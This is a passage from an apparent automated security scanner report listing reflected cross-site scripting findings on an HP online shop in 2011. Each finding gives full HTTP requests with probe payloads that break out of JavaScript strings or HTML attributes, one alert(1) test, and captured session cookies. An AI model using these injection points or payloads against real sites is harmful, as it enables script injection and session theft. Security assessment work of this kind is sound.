jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; EMID=; s_depth=17; s_cc=true; 
HP_EBUS_HP_CLICKS=4x15x6213; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Aeveryday%252520computing%25253Ap7xt_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BstoConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:17 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=TyYTT6KpZwV7QBtJlQzC8zGqmWMx2TfhNgDFBZVQCyQfJd6SKdvL!-1039217636; expires=Friday, 23-Sep-2011 01:09:18 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:18 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 230077

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=36259d" a=b 8dcb49babd8&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do">
...[SNIP]...

1.25. http://www.shopping.hp.com/supplies [HHOJSID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /supplies

Issue detail

The value of the HHOJSID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1423'%3b8f5ce4cb3e7 was submitted in the HHOJSID parameter. This input was echoed as c1423';8f5ce4cb3e7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /supplies;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_homec1423'%3b8f5ce4cb3e7 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkiit2e2AN7NS3rulTfcQyX0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=3x3x19

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:55:23 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrgtuf2Q18Minis1vZcQeYnGvi&s1=xss+printer&s2=xss+printeredf6ffb93d89de9464acd56a&s3=edf6ffb9384ae95321d80a57; expires=Friday, 20-Jan-2012 00:55:23 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:55:23 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 201417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...
<landing||1|;;;>

var s_prop21 = 'HP ink and HP toner' + "||1|";

var s_pageName = 'hho:gs:landing:ink_toner';
var s_prop4 = 'in_R329_prodexp/hhoslp/ipg/lateralnav_supplies_homec1423';8f5ce4cb3e7|HP ink and HP toner';
var s_channel = 'supplies';
var s_eVar23 = s_channel;
var omni_category = '';
if(omni_category != '') {
   var s_eVar22 = 'supplies:' + omni_category;
   var s_prop25 = 'supp
...[SNIP]...

1.26. http://www.shopping.hp.com/webapp/shopping/add_to_cart.do [nextPage parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/add_to_cart.do

Issue detail

The value of the nextPage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee7f9"a%3d"b"da6a923fc98 was submitted in the nextPage parameter. This input was echoed as ee7f9"a="b"da6a923fc98 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

POST /webapp/shopping/add_to_cart.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 298
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; hpshopping=1&user_id=mlkvid2S2AhwMy3quFbXdAbTng%3D%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; EMID=; s_depth=18; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Asubcategory%3Ap7xt%20series; 
s_cc=true; HP_EBUS_HP_CLICKS=4x16x6387; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asubcategory%25253Ap7xt%252520series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257Bjavascript%25253AitemAdded('ADD_14182135_TO_CART'%25252C'SUBMIT_14182135_IMAGE'%25252C'big'%25252C'2'%2526oidt%253D2%2526ot%253DBUTTON

add_prod_id=BV704AA%2523ABA&ajaxCall=false&ADD=ADD&page=&nextPage=%2Fproduct_detail.do%3FstoreName%3Dcomputer_store%26landing%3Ddesktops%26category%3Dp7xt_series%26subcat1%3Drts%26catLevel%3D3%26mc%3D%26product_code%3DBV704AA%2523ABA%26tab%3D%26fromPage%3D%2Fshopping%2Fgeneric_subcategory.doee7f9"a%3d"b"da6a923fc98&qty=1

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:09:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkog96V2A1%2FMS3vu1XWdAKd0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGSedf6ffb978573aea6e9e5a11&cart_id=1603777571; expires=Friday, 20-Jan-2012 01:09:38 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:09:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 224764

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hp
...[SNIP]...
/product_detail.do?clear_recommends=1&storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.doee7f9"a="b"da6a923fc98&pageLink=true&bvLoadCart=1&omniData=" class="udrlinesmall">
...[SNIP]...

1.27. http://www.shopping.hp.com/webapp/shopping/can.do [catLevel parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/can.do

Issue detail

The value of the catLevel request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c9e0"%20a%3db%2063316488f92 was submitted in the catLevel parameter. This input was echoed as 6c9e0" a=b 63316488f92 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webapp/shopping/can.do?landing=esp&category=Notebook&catLevel=16c9e0"%20a%3db%2063316488f92&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCs HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; hpcompc_usen=cartExists=true; EMID=; s_depth=21; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11101; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aservices%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fcan.do_landing%25253Desp%252526category%25253DNotebook%252526catLevel%25253D1%252526storeName%25253Dstorefronts%252526jumpid%25253Din__1%2526oidt%253D1%2526ot%253DIMG%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:20:20 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:20:22 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 403530


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
<input type="hidden" name="nextPage" value="/product_detail.do?storeName=storefronts&landing=esp&category=Notebook&subcat1=&catLevel=16c9e0" a=b 63316488f92&mc=&product_code=UL031A&tab=&fromPage=/shopping/can.do">
...[SNIP]...

1.28. http://www.shopping.hp.com/webapp/shopping/can.do [jumpid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/can.do

Issue detail

The value of the jumpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d0f61'%3b147eb6a0738 was submitted in the jumpid parameter. This input was echoed as d0f61';147eb6a0738 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/shopping/can.do?landing=esp&category=Notebook&catLevel=1&storeName=storefronts&jumpid=in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCsd0f61'%3b147eb6a0738 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; hpcompc_usen=cartExists=true; EMID=; s_depth=21; hp_cust_seg_sel=HHO; 
gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11101; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Aservices%2526pidt%253D1%2526oid%253D%25252Fwebapp%25252Fshopping%25252Fcan.do_landing%25253Desp%252526category%25253DNotebook%252526catLevel%25253D1%252526storeName%25253Dstorefronts%252526jumpid%25253Din__1%2526oidt%253D1%2526ot%253DIMG%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:20:42 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:20:41 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 400395


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...
null")
omni_subcat1 = "";

var s_prop21 = "|" + omni_category + "|" + omni_catLevel + "|" + omni_subcat1 ;
var s_prop4 = 'in_R329_prodexp/hhoslp/psg_ipg/esp/Laptops_and_mini_PCsd0f61';147eb6a0738|Laptops and mini PCs';
var omni_landing = 'esp';

if(omni_landing == null || omni_landing == '' || omni_landing == 'null')
omni_landing = '';
if(omni_category == null || omn
...[SNIP]...

1.29. http://www.shopping.hp.com/webapp/shopping/product_comparison.do [PROD_LIST parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.shopping.hp.com
Path:   /webapp/shopping/product_comparison.do

Issue detail

The value of the PROD_LIST request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e7d1"%3ba4830b19c2d was submitted in the PROD_LIST parameter. This input was echoed as 6e7d1";a4830b19c2d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /webapp/shopping/product_comparison.do HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 152
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/product_detail.do?storeName=computer_store&landing=desktops&category=p7xt_series&subcat1=rts&catLevel=3&mc=&product_code=BV704AA%23ABA&tab=&fromPage=/shopping/generic_subcategory.do&pageLink=true&bvLoadCart=1&omniData=549e5%2527%253balert%25281%2529%252f%252f9d266d5f0bd
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; HP_EBUS=true; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fall-in-one_pcs'%2C'1316672342103'%5D%5D; prop12=r602; s_var_20=re_r602_dp_bg7_na_ipg_mar11_psaioa_pseaio1; 